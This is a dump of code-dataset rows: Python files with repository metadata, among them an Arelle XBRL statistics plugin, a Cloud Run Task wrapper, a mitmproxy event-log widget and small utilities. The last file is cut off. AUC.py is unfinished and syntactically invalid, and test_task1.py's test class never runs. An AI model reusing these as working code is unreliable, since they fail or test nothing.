| Column | Dtype | Range / values |
|---|---|---|
| blob_id | stringlengths | 40–40 |
| directory_id | stringlengths | 40–40 |
| path | stringlengths | 3–616 |
| content_id | stringlengths | 40–40 |
| detected_licenses | sequencelengths | 0–112 |
| license_type | stringclasses | 2 values |
| repo_name | stringlengths | 5–115 |
| snapshot_id | stringlengths | 40–40 |
| revision_id | stringlengths | 40–40 |
| branch_name | stringclasses | 777 values |
| visit_date | timestamp[us] | 2015-08-06 10:31:46 – 2023-09-06 10:44:38 |
| revision_date | timestamp[us] | 1970-01-01 02:38:32 – 2037-05-03 13:00:00 |
| committer_date | timestamp[us] | 1970-01-01 02:38:32 – 2023-09-06 01:08:06 |
| github_id | int64 | 4.92k – 681M, nullable (⌀) |
| star_events_count | int64 | 0 – 209k |
| fork_events_count | int64 | 0 – 110k |
| gha_license_id | stringclasses | 22 values |
| gha_event_created_at | timestamp[us] | 2012-06-04 01:52:49 – 2023-09-14 21:59:50, nullable (⌀) |
| gha_created_at | timestamp[us] | 2008-05-22 07:58:19 – 2023-08-21 12:35:19, nullable (⌀) |
| gha_language | stringclasses | 149 values |
| src_encoding | stringclasses | 26 values |
| language | stringclasses | 1 value |
| is_vendor | bool | 2 classes |
| is_generated | bool | 2 classes |
| length_bytes | int64 | 3 – 10.2M |
| extension | stringclasses | 188 values |
| content | stringlengths | 3 – 10.2M |
| authors | sequencelengths | 1–1 |
| author_id | stringlengths | 1–132 |
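The rows below follow this schema, one source file per row. A minimal sketch of streaming a few rows with the Hugging Face `datasets` library; the dataset path `org/code-dataset` is a placeholder, not the actual repository name:

```python
from datasets import load_dataset

# Placeholder dataset path; substitute the real repository id.
ds = load_dataset("org/code-dataset", split="train", streaming=True)

# Stream the first row and show a few metadata columns alongside the file body.
for row in ds.take(1):
    print(row["repo_name"], row["path"], row["length_bytes"])
    print(row["content"][:200])
```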
6ec7249fb25fcc334c8ba9b5b5d6ce61012c410e | c2e49d32b2613d702dd06067bd0ec7846a319fd5 | /arelle/plugin/instanceInfo.py | 92187ad858d39887fc97f227c0073ceba1900616 | [
"Apache-2.0"
] | permissive | hamscher/Arelle | c9a020a5955a313c14a4db3a4e7122ec9599714c | 64c1beddcc7163e571011faf07a03d8ffe18bb78 | refs/heads/master | 2023-08-24T14:12:49.055954 | 2021-10-17T16:55:56 | 2021-10-17T16:55:56 | 284,703,106 | 0 | 0 | Apache-2.0 | 2020-08-10T15:48:15 | 2020-08-03T13:08:08 | Python | UTF-8 | Python | false | false | 11,510 | py | '''
instanceInfo.py provides information about an XBRL instance
(c) Copyright 2018 Mark V Systems Limited, All rights reserved.
'''
import sys, os, time, math, re, logging
from collections import defaultdict
from arelle.ValidateXbrlCalcs import inferredDecimals, rangeValue
from arelle import ModelDocument
from arelle.ModelInstanceObject import ModelFact
memoryAtStartup = 0
timeAtStart = 0
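# Matches @style values that carry an -sec-ix-hidden or -esef-ix-hidden CSS
# property (e.g. "display:none;-sec-ix-hidden:fact42"); group 3 is the fact id.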
styleIxHiddenPattern = re.compile(r"(.*[^\w]|^)-(sec|esef)-ix-hidden\s*:\s*([\w.-]+).*")
def startup(cntlr, options, *args, **kwargs):
global memoryAtStartup, timeAtStart
memoryAtStartup = cntlr.memoryUsed
timeAtStart = time.time()
def showInfo(cntlr, options, modelXbrl, _entrypoint, *args, **kwargs):
for url, doc in sorted(modelXbrl.urlDocs.items(), key=lambda i: i[0]):
if not any(url.startswith(w) for w in ("https://xbrl.sec.gov/", "http://xbrl.sec.gov/", "http://xbrl.fasb.org/", "http://www.xbrl.org/",
"http://xbrl.ifrs.org/", "http://www.esma.europa.eu/")):
cntlr.addToLog("File {} size {:,}".format(doc.basename, os.path.getsize(doc.filepath)), messageCode="info", level=logging.DEBUG)
cntlr.addToLog("Heap memory before loading {:,}".format(memoryAtStartup), messageCode="info", level=logging.DEBUG)
cntlr.addToLog("Heap memory after loading {:,}".format(cntlr.memoryUsed), messageCode="info", level=logging.DEBUG)
cntlr.addToLog("Time to load {:.2f} seconds".format(time.time() - timeAtStart), messageCode="info", level=logging.DEBUG)
isInlineXbrl = modelXbrl.modelDocument.type in (ModelDocument.Type.INLINEXBRL, ModelDocument.Type.INLINEXBRLDOCUMENTSET)
if isInlineXbrl:
instanceType = "inline XBRL, number of documents {}".format(len(modelXbrl.ixdsHtmlElements))
else:
instanceType = "xBRL-XML"
cntlr.addToLog("Instance type {}".format(instanceType), messageCode="info", level=logging.DEBUG)
numContexts = len(modelXbrl.contexts)
numLongContexts = 0
bytesSaveable = 0
frequencyOfDims = {}
sumNumDims = 0
distinctDurations = set()
distinctInstants = set()
shortContextIdLen = int(math.log10(numContexts or 1)) + 2 # if no contexts, use 1 for log function to work
xbrlQnameCount = 0
xbrlQnameLengths = 0
for c in modelXbrl.contexts.values():
sumNumDims += len(c.qnameDims)
for d in c.qnameDims.values():
dimQname = str(d.dimensionQname)
frequencyOfDims[dimQname] = frequencyOfDims.get(dimQname,0) + 1
xbrlQnameCount += 1
xbrlQnameLengths += len(d.dimensionQname.localName)
if c.isInstantPeriod:
distinctInstants.add(c.instantDatetime)
elif c.isStartEndPeriod:
distinctDurations.add((c.startDatetime, c.endDatetime))
if len(c.id) > shortContextIdLen:
bytesSaveable += len(c.id) - shortContextIdLen
cntlr.addToLog("Number of contexts {:,}".format(numContexts), messageCode="info", level=logging.DEBUG)
cntlr.addToLog("Number of distinct durations {:,}".format(len(distinctDurations)), messageCode="info", level=logging.DEBUG)
cntlr.addToLog("Number of distinct instants {:,}".format(len(distinctInstants)), messageCode="info", level=logging.DEBUG)
cntlr.addToLog("Avg number dimensions per contexts {:,.2f}".format(sumNumDims/numContexts if numContexts else 0), messageCode="info", level=logging.DEBUG)
mostPopularDims = sorted(frequencyOfDims.items(), key=lambda i:"{:0>9},{}".format(999999999-i[1],i[0]))
for dimName, count in mostPopularDims[0:3]:
cntlr.addToLog("Dimension {} used in {:,} contexts".format(dimName, count), messageCode="info", level=logging.DEBUG)
numFacts = 0
numTableTextBlockFacts = 0
lenTableTextBlockFacts = 0
numTextBlockFacts = 0
lenTextBlockFacts = 0
distinctElementsInFacts = set()
factsPerContext = {}
factForConceptContextUnitHash = defaultdict(list)
for f in modelXbrl.factsInInstance:
context = f.context
concept = f.concept
distinctElementsInFacts.add(f.qname)
numFacts += 1
if f.qname.localName.endswith("TableTextBlock"):
numTableTextBlockFacts += 1
lenTableTextBlockFacts += len(f.xValue)
elif f.qname.localName.endswith("TextBlock"):
numTextBlockFacts += 1
lenTextBlockFacts += len(f.xValue)
if context is not None and concept is not None:
factsPerContext[context.id] = factsPerContext.get(context.id,0) + 1
factForConceptContextUnitHash[f.conceptContextUnitHash].append(f)
bytesSaveable += len(context.id) - shortContextIdLen
mostPopularContexts = sorted(factsPerContext.items(), key=lambda i:"{:0>9},{}".format(999999999-i[1],i[0]))
cntlr.addToLog("Number of facts {:,}".format(numFacts), messageCode="info", level=logging.DEBUG)
cntlr.addToLog("Number of TableTextBlock facts {:,} avg len {:,.0f}".format(numTableTextBlockFacts, lenTableTextBlockFacts/numTableTextBlockFacts if numTableTextBlockFacts else 0), messageCode="info", level=logging.DEBUG)
cntlr.addToLog("Number of TextBlock facts {:,} avg len {:,.0f}".format(numTextBlockFacts, lenTextBlockFacts/numTableTextBlockFacts if numTableTextBlockFacts else 0), messageCode="info", level=logging.DEBUG)
cntlr.addToLog("Max number facts per context {:,}".format(mostPopularContexts[0][1] if mostPopularContexts else 0), messageCode="info", level=logging.DEBUG)
cntlr.addToLog("Avg number facts per context {:,.2f}".format(sum([v for v in factsPerContext.values()])/numContexts if numContexts else 0), messageCode="info", level=logging.DEBUG)
cntlr.addToLog("Distinct elements in facts {:,}".format(len(distinctElementsInFacts)), messageCode="info", level=logging.DEBUG)
cntlr.addToLog("Number of bytes saveable context id of {} length is {:,}".format(shortContextIdLen, bytesSaveable), messageCode="info", level=logging.DEBUG)
aspectEqualFacts = defaultdict(list)
numConsistentDupFacts = numInConsistentDupFacts = 0
for hashEquivalentFacts in factForConceptContextUnitHash.values():
if len(hashEquivalentFacts) > 1:
for f in hashEquivalentFacts:
aspectEqualFacts[(f.qname,f.contextID,f.unitID,
f.xmlLang if f.concept.type.isWgnStringFactType else None)].append(f)
for fList in aspectEqualFacts.values():
f0 = fList[0]
if f0.concept.isNumeric:
if any(f.isNil for f in fList):
_inConsistent = not all(f.isNil for f in fList)
elif all(inferredDecimals(f) == inferredDecimals(f0) for f in fList[1:]): # same decimals
v0 = rangeValue(f0.value)
_inConsistent = not all(rangeValue(f.value) == v0 for f in fList[1:])
else: # not all have same decimals
aMax, bMin = rangeValue(f0.value, inferredDecimals(f0))
for f in fList[1:]:
a, b = rangeValue(f.value, inferredDecimals(f))
if a > aMax: aMax = a
if b < bMin: bMin = b
_inConsistent = (bMin < aMax)
else:
_inConsistent = any(not f.isVEqualTo(f0) for f in fList[1:])
if _inConsistent:
numInConsistentDupFacts += 1
else:
numConsistentDupFacts += 1
aspectEqualFacts.clear()
cntlr.addToLog("Number of duplicate facts consistent {:,} inconsistent {:,}".format(numConsistentDupFacts, numInConsistentDupFacts), messageCode="info", level=logging.DEBUG)
styleAttrCounts = {}
totalStyleLen = 0
continuationElements = {}
ixNsPrefix = "{http://www.xbrl.org/2013/inlineXBRL}"
for ixdsHtmlRootElt in getattr(modelXbrl, "ixdsHtmlElements", ()): # ix root elements if inline
for ixElt in ixdsHtmlRootElt.iterdescendants():
style = ixElt.get("style")
ixEltTag = str(ixElt.tag)
if style:
styleAttrCounts[style] = styleAttrCounts.get(style,0) + 1
if styleIxHiddenPattern.match(style) is None:
totalStyleLen += len(style)
if ixEltTag == "{http://www.xbrl.org/2013/inlineXBRL}continuation" and ixElt.id:
continuationElements[ixElt.id] = ixElt
if ixEltTag.startswith(ixNsPrefix):
localName = ixEltTag[len(ixNsPrefix):]
if localName == "continuation" and ixElt.id:
continuationElements[ixElt.id] = ixElt
elif localName in ("nonFraction", "nonNumeric", "fraction"):
xbrlQnameCount += 1
xbrlQnameLengths += len(ixElt.qname.localName)
elif isinstance(ixElt, ModelFact):
xbrlQnameCount += 2
xbrlQnameLengths += len(ixElt.qname.localName)
def locateContinuation(element, chain=None):
# Walk the ix:continuation chain via continuedAt ids, counting hops.
contAt = element.get("continuedAt")
if contAt:
if contAt in continuationElements:
if chain is None: chain = [element]
contElt = continuationElements[contAt]
if contElt not in chain:
chain.append(contElt)
element._continuationElement = contElt
return locateContinuation(contElt, chain)
elif chain: # end of chain
return len(chain)
return len(chain) if chain else 0 # broken or absent chain: report hops so far
numContinuations = 0
maxLenLen = 0
maxLenHops = 0
maxHops = 0
maxHopsLen = 0
for f in modelXbrl.factsInInstance:
if f.get("continuedAt"):
numContinuations += 1
_len = len(f.xValue)
_hops = locateContinuation(f)
if _hops > maxHops:
maxHops = _hops
maxHopsLen = _len
if _len > maxLenLen:
maxLenLen = _len
maxLenHops = _hops
cntlr.addToLog("Number of continuation facts {:,}".format(numContinuations), messageCode="info", level=logging.DEBUG)
cntlr.addToLog("Longest continuation fact {:,} number of hops {:,}".format(maxLenLen, maxLenHops), messageCode="info", level=logging.DEBUG)
cntlr.addToLog("Most continuation hops {:,} fact len {:,}".format(maxHops, maxHopsLen), messageCode="info", level=logging.DEBUG)
numDupStyles = sum(1 for n in styleAttrCounts.values() if n > 1)
bytesSaveableByCss = sum(len(s)*(n-1) for s,n in styleAttrCounts.items() if n > 1)
cntlr.addToLog("Number of duplicate styles {:,}, bytes saveable by CSS {:,}, len of all non-ix-hidden @styles {:,}".format(numDupStyles, bytesSaveableByCss, totalStyleLen), messageCode="info", level=logging.DEBUG)
cntlr.addToLog("Number of XBRL QNames {:,}, bytes saveable by EBA-style element names {:,}".format(xbrlQnameCount, xbrlQnameLengths - (5*xbrlQnameCount)), messageCode="info", level=logging.DEBUG)
__pluginInfo__ = {
'name': 'Instance Info',
'version': '1.0',
'description': "This plug-in displays instance information for sizing and performance issues.",
'license': 'Apache-2',
'author': 'Mark V Systems Limited',
'copyright': '(c) Copyright 2020 Mark V Systems Limited, All rights reserved.',
# classes of mount points (required)
'CntlrCmdLine.Filing.Start': startup,
'CntlrCmdLine.Xbrl.Loaded': showInfo
}
| [
"[email protected]"
] | |
1031b15ef4224999d0fc93543846634035595c25 | 7f2511240539b1327a5a97060fa59f811bdc2889 | /django_functest/exceptions.py | a95b6b4d9fd5ad70530a83cac35c6ae76290059b | [] | no_license | liushilive/django-functest | e1080c2e8b9031ba9b271bfd56029f0b77082e5a | 8cffd4ae01dd9a004acc0f37088a34ce5b5e0983 | refs/heads/master | 2021-01-20T14:16:23.133597 | 2018-03-30T07:06:22 | 2018-03-30T07:06:22 | 82,748,549 | 0 | 0 | null | 2018-03-30T07:06:23 | 2017-02-22T01:57:10 | Python | UTF-8 | Python | false | false | 297 | py | from __future__ import absolute_import, print_function, unicode_literals
class WebTestNoSuchElementException(Exception):
pass
class WebTestMultipleElementsException(Exception):
pass
class WebTestCantUseElement(Exception):
pass
class SeleniumCantUseElement(Exception):
pass
| [
"[email protected]"
] | |
cbde25477696d51659f3ddfcf455ceb4387eb642 | 6515dee87efbc5edfbf4c117e262449999fcbb50 | /Sorting/AUC.py | c6548f4f09b7421ff5d5d311ff99bde1e848da1e | [] | no_license | wangyunge/algorithmpractice | 24edca77e180854b509954dd0c5d4074e0e9ef31 | 085b8dfa8e12f7c39107bab60110cd3b182f0c13 | refs/heads/master | 2021-12-29T12:55:38.096584 | 2021-12-12T02:53:43 | 2021-12-12T02:53:43 | 62,696,785 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 758 | py | class AucCompute():
def __init__(self):
self.samples = []
samples = [(0.5, 1), (0.6, 1), (0.2, 0), (0.55, 0)]
def compute(self, label, score):
samples = sorted()
def roc_area(self, ):
def true_pos_rate():
return float(tp)/(float(tp) + float(fn))
def false_peg_rate():
return float(fp)/(float(tn) + float(fp))
sample_total = float(len(samples))
pos_total = 0.0
for label, _ in samples:
pos_total += label
neg_total = sample_total - pos_total
last_score =
tp = 0
fn = pos_total /
for label, score in samples:
if label = 1:
tp +=1
else:
fp += 1
| [
"[email protected]"
] | |
fb64b70aa19618482a0dc633386ee2f4f1e330f4 | ec87bf8c5a4617ade5556b6dc4df12a6f1056566 | /Sec_7/7.2/test2.py | 27931f07b2eca51e07f6633e454cb2f415ed34ca | [] | no_license | WiconWang/spider_project | a5772b1bda63695d9e398edd31a3574e568ef0b3 | f49a93c1cab5716d4dafecb7479a3be2a4af91ad | refs/heads/master | 2023-01-24T08:34:20.951665 | 2020-11-25T06:25:04 | 2020-11-25T06:25:04 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 203 | py | import requests
url = 'http://192.168.6.160:8050/render.png?url=https://www.jd.com&wait=5&width=1000&height=700'
response = requests.get(url)
with open('jd.png', 'wb') as f:
f.write(response.content) | [
"[email protected]"
] | |
bdab442eec0258db57481eaade41c78e4c9425f5 | 6478723d180a8ef39941ba04b80c1eca9f437323 | /1063. Number of Valid Subarrays.py | d2ff3ac378cb81f52d28f7851e45d2f12bbe5249 | [] | no_license | NiuNiu-jupiter/Leetcode | 2a49a365898ecca393cb1eb53a47f4501b25952d | e278ae6ded32f6a2d054ae11ad8fcc45e7bd0f86 | refs/heads/master | 2022-11-22T01:05:57.417538 | 2020-07-28T23:34:39 | 2020-07-28T23:34:39 | 182,104,119 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,174 | py | """
Given an array A of integers, return the number of non-empty continuous subarrays that satisfy the following condition:
The leftmost element of the subarray is not larger than other elements in the subarray.
Example 1:
Input: [1,4,2,5,3]
Output: 11
Explanation: There are 11 valid subarrays: [1],[4],[2],[5],[3],[1,4],[2,5],[1,4,2],[2,5,3],[1,4,2,5],[1,4,2,5,3].
Example 2:
Input: [3,2,1]
Output: 3
Explanation: The 3 valid subarrays are: [3],[2],[1].
Example 3:
Input: [2,2,2]
Output: 6
Explanation: There are 6 valid subarrays: [2],[2],[2],[2,2],[2,2],[2,2,2].
"""
from typing import List

def validSubarrays(nums: List[int]) -> int:
    if not nums:
        return 0  # an empty array has no subarrays
    """
    Brute force for reference, O(n^2): extend each start index i to the right
    while nums[i] remains <= every element of the window.
    res = 0
    for i in range(len(nums)):
        j = i
        while j < len(nums):
            if nums[i] <= nums[j]:
                res += 1
                j += 1
            else:
                break
    return res
    """
    # Monotonic stack, O(n): each element stays on the stack until the first
    # smaller element to its right pops it, so len(stack) after pushing nums[i]
    # counts the valid subarrays ending at index i.
    res, stack = 0, []
    for a in nums:
        while stack and stack[-1] > a:
            stack.pop()
        stack.append(a)    # stack for [1,4,2,5,3] ends as [1,2,3]
        res += len(stack)  # res trace for [1,4,2,5,3]: 1, 3, 5, 8, 11
    return res
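# Quick check against the docstring examples.
if __name__ == "__main__":
    print(validSubarrays([1, 4, 2, 5, 3]))  # 11
    print(validSubarrays([3, 2, 1]))        # 3
    print(validSubarrays([2, 2, 2]))        # 6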
| [
"[email protected]"
] | |
a1acccb1aba90199654cacf3ead931973c054ceb | bc9f66258575dd5c8f36f5ad3d9dfdcb3670897d | /lib/googlecloudsdk/api_lib/run/task.py | c288e4e773ffe47bea82d77e5052543b63594cc1 | [
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | google-cloud-sdk-unofficial/google-cloud-sdk | 05fbb473d629195f25887fc5bfaa712f2cbc0a24 | 392abf004b16203030e6efd2f0af24db7c8d669e | refs/heads/master | 2023-08-31T05:40:41.317697 | 2023-08-23T18:23:16 | 2023-08-23T18:23:16 | 335,182,594 | 9 | 2 | NOASSERTION | 2022-10-29T20:49:13 | 2021-02-02T05:47:30 | Python | UTF-8 | Python | false | false | 3,906 | py | # -*- coding: utf-8 -*- #
# Copyright 2022 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Wraps a Cloud Run Task message with convenience methods."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
import enum
from googlecloudsdk.api_lib.run import container_resource
from googlecloudsdk.api_lib.run import k8s_object
from googlecloudsdk.core.console import console_attr
AUTHOR_ANNOTATION = k8s_object.RUN_GROUP + '/creator'
STARTED_CONDITION = 'Started'
COMPLETED_CONDITION = 'Completed'
EXECUTION_LABEL = 'run.googleapis.com/execution'
STATE_LABEL = 'run.googleapis.com/runningState'
class RestartPolicy(enum.Enum):
NEVER = 'Never'
ON_FAILURE = 'OnFailure'
class Task(container_resource.ContainerResource):
"""Wraps a Cloud Run Execution message, making fields more convenient."""
API_CATEGORY = 'run.googleapis.com'
KIND = 'Task'
READY_CONDITION = COMPLETED_CONDITION
TERMINAL_CONDITIONS = frozenset({STARTED_CONDITION, READY_CONDITION})
@classmethod
def New(cls, client, namespace):
"""Produces a new Task object.
Args:
client: The Cloud Run API client.
namespace: str, The serving namespace.
Returns:
A new Task object.
"""
ret = super(Task, cls).New(client, namespace)
ret.spec.template.spec.containers = [client.MESSAGES_MODULE.Container()]
return ret
@property
def author(self):
return self.annotations.get(AUTHOR_ANNOTATION)
@property
def index(self):
return self.status.index or 0
@property
def execution_name(self):
return self.labels[EXECUTION_LABEL]
@property
def running_state(self):
return self.labels[STATE_LABEL] if STATE_LABEL in self.labels else None
@property
def service_account(self):
"""The service account to use as the container identity."""
return self.spec.serviceAccountName
def ReadySymbolAndColor(self):
"""Return a tuple of ready_symbol and display color for this object."""
encoding = console_attr.GetConsoleAttr().GetEncoding()
if self.running_state == 'Running':
return self._PickSymbol('\N{HORIZONTAL ELLIPSIS}', '.',
encoding), 'yellow'
elif self.running_state == 'Succeeded':
return self._PickSymbol('\N{HEAVY CHECK MARK}', '+', encoding), 'green'
elif self.running_state == 'Failed':
return 'X', 'red'
elif self.running_state == 'Cancelled':
return '!', 'yellow'
elif self.running_state == 'Abandoned':
return '-', 'yellow'
return '.', 'yellow'
@property
def start_time(self):
return self.status.startTime
@property
def completion_time(self):
return self.status.completionTime
@property
def retries(self):
if self.status.startTime is not None:
return self.status.retried or 0
return None
@property
def last_exit_code(self):
if (self.status.lastAttemptResult is not None and
self.status.lastAttemptResult.exitCode is not None):
return self.status.lastAttemptResult.exitCode
elif self.status.completionTime is not None:
return 0
return None
@property
def last_exit_message(self):
if (self.status.lastAttemptResult is not None and
self.status.lastAttemptResult.status.message is not None):
return self.status.lastAttemptResult.status.message
return ''
| [
"[email protected]"
] | |
5079e05b86e2723e8d0e70be3749a7efa59a9183 | d10a1814735fa6e7fc9354bad8d8251eb81fa9fc | /core/decorators.py | c9c25be29165176c68365e2285ab55993572af80 | [] | no_license | SeedyROM/django-social-spotify-example | 15d6a43045009e0f28e49f4f832bb0b1b1bbae51 | adb6cc9cfda6d76d45ef9c3611cacfb17ba89831 | refs/heads/master | 2022-12-14T21:49:43.512965 | 2018-03-28T08:40:01 | 2018-03-28T08:40:01 | 127,084,250 | 3 | 0 | null | 2022-12-08T00:55:24 | 2018-03-28T04:36:03 | Python | UTF-8 | Python | false | false | 696 | py | from django.contrib.auth import logout
from django.contrib.auth.decorators import login_required
from django.shortcuts import redirect
from requests.exceptions import HTTPError
from social_django.utils import load_strategy
def spotify_view(function):
@login_required
def wrap(request, *args, **kwargs):
social = request.user.social_auth.get(provider='spotify')
token = social.get_access_token(load_strategy())
try:
return function(request, token, *args, **kwargs)
except HTTPError as e:
print(f'Failed using token because of HTTPError: "{e}"')
return redirect('logout')
wrap.__doc__ = function.__doc__
wrap.__name__ = function.__name__
return wrap
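# Hypothetical usage sketch: the decorated view receives the refreshed token
# as its second positional argument.
#
# @spotify_view
# def top_tracks(request, token):
#     ...  # call the Spotify Web API with `token`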
| [
"[email protected]"
] | |
c005b4665be718a64a4934ba60988c4d6d45bf34 | c4d56a69bea9daecab4a6d6dcf64ea40d22eb48e | /mitmproxy/tools/console/eventlog.py | 0b8a3f8cf9167e612d17ad473ade11e91456e26b | [
"MIT"
] | permissive | iBrandon/mitmproxy | 981f44baa8c6ea7cfddafeb38bcf93a853b4c682 | cafa094f75732bd803972aecb71e2d1032ee2390 | refs/heads/master | 2021-01-20T17:29:44.817486 | 2017-05-10T08:11:27 | 2017-05-10T08:11:27 | 90,879,892 | 2 | 0 | null | 2017-05-10T15:28:43 | 2017-05-10T15:28:43 | null | UTF-8 | Python | false | false | 1,315 | py | import urwid
from mitmproxy.tools.console import signals
EVENTLOG_SIZE = 10000
class LogBufferWalker(urwid.SimpleListWalker):
pass
class EventLog(urwid.ListBox):
keyctx = "eventlog"
def __init__(self, master):
self.walker = LogBufferWalker([])
self.master = master
urwid.ListBox.__init__(self, self.walker)
signals.sig_add_log.connect(self.sig_add_log)
def set_focus(self, index):
if 0 <= index < len(self.walker):
super().set_focus(index)
def keypress(self, size, key):
if key == "z":
self.master.clear_events()
key = None
elif key == "m_end":
self.set_focus(len(self.walker) - 1)
elif key == "m_start":
self.set_focus(0)
return urwid.ListBox.keypress(self, size, key)
def sig_add_log(self, sender, e, level):
txt = "%s: %s" % (level, str(e))
if level in ("error", "warn"):
e = urwid.Text((level, txt))
else:
e = urwid.Text(txt)
self.walker.append(e)
if len(self.walker) > EVENTLOG_SIZE:
self.walker.pop(0)
if self.master.options.console_focus_follow:
self.walker.set_focus(len(self.walker) - 1)
def clear_events(self):
self.walker[:] = []
| [
"[email protected]"
] | |
ec1825cba9d2657ee0ecdc2ebb87aed9c258df64 | cdad738a7085a997b5349a94aedb4db8da78da8f | /TreeProduction/test/crab/w01_hijing8tev_gensimtreeproduction/crab.py | c8cf7f7e5455d3f3de7b81e0aec48396bdacec2b | [
"MIT"
] | permissive | tuos/DirectLoopAnalysis | 4851d122d4723e498705c1d2cb100cbf3eda8d43 | 6f5f02538454d2240d0232665b9b17d07eb79854 | refs/heads/master | 2020-06-12T22:24:01.081755 | 2020-01-21T17:49:37 | 2020-01-21T17:49:37 | 194,446,479 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 871 | py | from CRABClient.UserUtilities import config, getUsernameFromSiteDB
config = config()
config.General.requestName = 'w01_hijing8tev_gensimtreeproduction'
config.General.workArea = 'project_w01_hijing8tev_gensimtreeproduction'
config.General.transferOutputs = True
config.General.transferLogs = False
config.JobType.pluginName = 'Analysis'
config.JobType.psetName = 'ConfFile_cfg.py'
config.Data.inputDataset = '/HIJING_pPb_8160_DataBS/pPb816Summer16DR-MB_80X_mcRun2_pA_v4-v2/AODSIM'
config.Data.inputDBS = 'global'
#config.Data.splitting = 'FileBased'
config.Data.splitting = 'Automatic'
#config.Data.unitsPerJob = 1
config.Data.outLFNDirBase = '/store/user/tuos/loops/cumulants/hijing/w01_hijing8tev_gensimtreeproduction'
config.Data.publication = False
config.Data.outputDatasetTag = 'w01_hijing8tev_gensimtreeproduction'
config.Site.storageSite = 'T2_US_Vanderbilt'
| [
"[email protected]"
] | |
4f532fb82b968462c6b2cba3a5fdbc06a4fd47c7 | c2ff2ee2b0c84e047a80cfdf0b0d0b122fc9db79 | /features/himario/mmediting/mmedit/datasets/generation_paired_dataset.py | 2df184d567d46c30260f0faf1c1112ad072dd09d | [
"Apache-2.0",
"MIT"
] | permissive | obarnard99/vilio | 275dcb62cdb8b2d8c55ab1e73f3a796bd2073a5b | 77aac226c3a0910410f11a5999f8908181f57ccd | refs/heads/master | 2023-06-29T17:02:02.282457 | 2021-06-22T09:50:11 | 2021-06-22T09:50:11 | 337,738,373 | 0 | 0 | MIT | 2021-06-22T09:50:12 | 2021-02-10T13:50:49 | Python | UTF-8 | Python | false | false | 1,466 | py | import os.path as osp
from .base_generation_dataset import BaseGenerationDataset
from .registry import DATASETS
@DATASETS.register_module()
class GenerationPairedDataset(BaseGenerationDataset):
"""General paired image folder dataset for image generation.
It assumes that the training directory is '/path/to/data/train'.
During test time, the directory is '/path/to/data/test'. '/path/to/data'
can be initialized by args 'dataroot'. Each sample contains a pair of
images concatenated in the w dimension (A|B).
Args:
dataroot (str | :obj:`Path`): Path to the folder root of paired images.
pipeline (List[dict | callable]): A sequence of data transformations.
test_mode (bool): Store `True` when building test dataset.
Default: `False`.
"""
def __init__(self, dataroot, pipeline, test_mode=False):
super(GenerationPairedDataset, self).__init__(pipeline, test_mode)
phase = 'test' if test_mode else 'train'
self.dataroot = osp.join(str(dataroot), phase)
self.data_infos = self.load_annotations()
def load_annotations(self):
"""Load paired image paths.
Returns:
list[dict]: List that contains paired image paths.
"""
data_infos = []
pair_paths = sorted(self.scan_folder(self.dataroot))
for pair_path in pair_paths:
data_infos.append(dict(pair_path=pair_path))
return data_infos
| [
"[email protected]"
] | |
08f69a4436ba0b5d7c98506b57dd7c74f16f4402 | caa7c209acd1b336fcd6c0f3d9e8a58ba1eb60ad | /test_task1.py | 4d95408c2199cab426d5994c5865354a8c64792e | [] | no_license | herzenuni/sem5-firsttask-04092018-arinasaf11-2 | b60375e511206aac94d0253ae69de6b957a9ffa2 | 10b3cc83ae8bce745e624229592667a1b18c9724 | refs/heads/master | 2021-07-25T14:11:26.582542 | 2018-12-28T13:09:23 | 2018-12-28T13:09:23 | 147,555,605 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 258 | py | import unittest
import task1
class test_task():
def test_func(self):
self.assertEqual(task1.func(2,'hex'), '0x2')
def test_func1(self):
self.assertEqual(task1.func(2), 'два')
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
b5cda5a37001a46ca5df718ba77b4f3d8ec7ebb2 | df55759bac7f788aa0c7ddbc620154ce2625b38a | /odps/runner/df/adapter.py | a32f62298d2cbec3de28231825d05509d93ca8cc | [
"Apache-2.0"
] | permissive | yjjsdu/aliyun-odps-python-sdk | 7b4bb21583d9fc8132157fd03f0ca7af2e410f26 | 72ba6ecc2e70d50a581385fffb4fedd1950ed285 | refs/heads/master | 2021-01-09T20:04:24.357789 | 2017-01-25T02:13:37 | 2017-01-25T02:13:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 17,481 | py | # encoding: utf-8
# Copyright 1999-2017 Alibaba Group Holding Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import copy
import itertools
import threading
import weakref
from ...models import Table
from ...df.core import DataFrame, CollectionExpr
from ...df.utils import to_collection as to_df_collection
from ...df.expr.core import ExprDictionary
from ...df.expr.dynamic import DynamicMixin
from ...df.expr.expressions import SequenceExpr, Scalar
from ...df.expr.expressions import FilterPartitionCollectionExpr
from ...df.backends.context import context
from ...compat import six, reduce
from ...config import options
from ..core import BaseRunnerNode, RunnerObject, ObjectDescription, EngineType, PortType
from ..utils import gen_table_name, hashable
_df_endpoint_dict = ExprDictionary()
_df_link_maintainer = ExprDictionary()
class DFIntermediateProject(object):
def __init__(self):
self.name = 'mocked_project'
class DFIntermediateTable(Table):
__slots__ = 'intermediate',
def __init__(self, **kwargs):
super(DFIntermediateTable, self).__init__(**kwargs)
self._loaded = True
self.intermediate = True
@property
def project(self):
if self.intermediate:
return DFIntermediateProject()
else:
return self.parent.parent
class DFNode(BaseRunnerNode):
def __init__(self, input_num=1):
super(DFNode, self).__init__("DataFrame", engine=EngineType.DF)
self.marshal({
